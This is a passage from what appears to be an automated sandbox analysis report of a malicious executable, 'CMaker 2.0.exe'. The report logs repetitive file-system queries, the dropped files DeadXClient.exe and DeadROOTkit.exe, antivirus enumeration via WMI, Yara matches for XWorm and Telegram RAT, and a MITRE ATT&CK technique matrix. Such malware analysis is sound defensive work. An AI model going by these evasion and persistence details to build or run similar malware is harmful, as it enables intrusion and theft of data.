                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\certifi\cacert.pem VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeQueries volume information: C:\Users\Public\DeadXClient.exe VolumeInformationJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeQueries volume information: C:\Users\Public\DeadROOTkit.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\Public\Deadsvchost.exeQueries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                        Source: C:\Users\Public\Deadsvchost.exeQueries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                        Source: C:\Users\Public\Deadsvchost.exeQueries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABEB480 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00007FF6FABEB480
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC05B00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,2_2_00007FF6FAC05B00
                        Source: C:\Users\user\AppData\Local\Temp\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: DeadXClient.exe, 00000006.00000002.3500000088.000000001BE30000.00000004.00000020.00020000.00000000.sdmp, DeadXClient.exe, 00000006.00000002.3500000088.000000001BE6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: svchost.exe, 0000001E.00000003.2486655004.0000022E67D5A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2487062721.0000022E67D5A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4828, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DeadROOTkit.exe PID: 4188, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Yara detected XWorm
                        Source: Yara matchFile source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.DeadXClient.exe.c60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4828, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DeadXClient.exe PID: 6684, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DeadROOTkit.exe PID: 4188, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\Public\DeadXClient.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4828, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DeadROOTkit.exe PID: 4188, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Yara detected XWorm
                        Source: Yara matchFile source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.DeadXClient.exe.c60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4828, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DeadXClient.exe PID: 6684, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DeadROOTkit.exe PID: 4188, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\Public\DeadXClient.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		1
                        Credential API Hooking                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts121
                        Native API                        		11
                        Scheduled Task/Job                        		612
                        Process Injection                        		111
                        Deobfuscate/Decode Files or Information                        		1
                        Input Capture                        		3
                        File and Directory Discovery                        		Remote Desktop Protocol1
                        Credential API Hooking                        		22
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts123
                        Command and Scripting Interpreter                        		21
                        Registry Run Keys / Startup Folder                        		11
                        Scheduled Task/Job                        		21
                        Obfuscated Files or Information                        		Security Account Manager34
                        System Information Discovery                        		SMB/Windows Admin Shares1
                        Input Capture                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts11
                        Scheduled Task/Job                        		Login Hook21
                        Registry Run Keys / Startup Folder                        		311
                        Software Packing                        		NTDS561
                        Security Software Discovery                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        PowerShell                        		Network Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets2
                        Process Discovery                        		SSHKeylogging13
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion                        		Cached Domain Credentials151
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                        Rootkit                        		DCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
                        Masquerading                        		Proc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Modify Registry                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                        Virtualization/Sandbox Evasion                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
                        Process Injection                        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                        Hidden Files and Directories                        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
